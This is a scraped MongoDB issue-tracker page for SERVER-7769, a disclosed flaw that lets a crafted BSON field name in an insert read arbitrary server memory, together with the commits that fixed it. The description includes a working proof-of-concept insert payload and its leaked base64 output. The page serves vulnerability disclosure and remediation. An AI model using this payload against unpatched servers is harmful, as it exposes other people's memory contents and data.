Uploaded image for project: 'Core Server'
  1. Core Server
  2. SERVER-7769

use --objcheck by default, Server arbitrary memory reading

    Details

    • Type: Bug
    • Status: Closed
    • Priority: Major - P3
    • Resolution: Fixed
    • Affects Version/s: None
    • Fix Version/s: 2.3.2
    • Component/s: None
    • Labels:
      None
    • Operating System:
      ALL

      Description

      The specialists of the Positive Research center have detected "Server arbitrary memory reading" vulnerability in MongoDB application.

      Cause of incorrect execution of BSON-document length in column name in the insert command it’s possible to insert a record which can contain a base64-encrypted server memory chunks.

      Example of use:

      Suppose you have a table "dropme" with write permission.

      Execute the following command with a result:

      > db.dropme.insert(

      {"\x16\x00\x00\x00\x05hello\x00\x010\x00\x00\x00world\x00\x00" : "world"}

      )
      > db.dropme.find()

      { "_id" : ObjectId("50857a4663944834b98eb4cc"), "" : null, "hello" : BinData(0,"d29ybGQAAAAACREAAAAQ/4wJSCCPCeyFjQkRAAAAAAAAAAAAWbcQAAAAMQAAAAEAAABgcicICAAAAAcAAACgKo0JABw5NAMAAAAAAAAAAAAAAMQ3jAlmAGkAQQAAAEIAaQBuAEQAYQB0AGEAKAAxADEAOQAsACIAYgAzAEoAcwBaAEEAQQBBAEEAQQBBAD0AIgApAAAAdABSAFEAAAAiAGgAZQBsAGwAbwAiACAAOgAgAEIAaQBuAEQAYQB0AGEAKAAxADEAOQAsAC...........................ACkALAAgACIAFg==") }

      After base64-code decryption you can get bytes from random server memory chunks.

      Credits

      The vulnerability was discovered by Mikhail Firstov, Positive Research Center (Positive Technologies Company)

        Issue Links

          Activity

          Hide
          auto auto (Inactive) added a comment -

          Author:

          {u'date': u'2012-12-18T14:40:08Z', u'name': u'Eliot Horowitz', u'email': u'eliot@10gen.com'}

          Message: SERVER-7769 - fast bson validate
          Branch: master
          https://github.com/mongodb/mongo/commit/6889d1658136c753998b4a408dc8d1a3ec28e3b9

          Show
          auto auto (Inactive) added a comment - Author: {u'date': u'2012-12-18T14:40:08Z', u'name': u'Eliot Horowitz', u'email': u'eliot@10gen.com'} Message: SERVER-7769 - fast bson validate Branch: master https://github.com/mongodb/mongo/commit/6889d1658136c753998b4a408dc8d1a3ec28e3b9
          Hide
          auto auto (Inactive) added a comment -

          Author:

          {u'date': u'2012-12-20T03:15:03Z', u'email': u'eliot@10gen.com', u'name': u'Eliot Horowitz'}

          Message: SERVER-7769 - turn objcheck on by default and use new fast bson validate
          Branch: master
          https://github.com/mongodb/mongo/commit/f9817a6cf64bdba8e1e1cef30a798110df746b58

          Show
          auto auto (Inactive) added a comment - Author: {u'date': u'2012-12-20T03:15:03Z', u'email': u'eliot@10gen.com', u'name': u'Eliot Horowitz'} Message: SERVER-7769 - turn objcheck on by default and use new fast bson validate Branch: master https://github.com/mongodb/mongo/commit/f9817a6cf64bdba8e1e1cef30a798110df746b58

            People

            • Votes:
              1 Vote for this issue
              Watchers:
              10 Start watching this issue

              Dates

              • Created:
                Updated:
                Resolved:
                Days since reply:
                2 years, 14 weeks, 3 days ago
                Date of 1st Reply: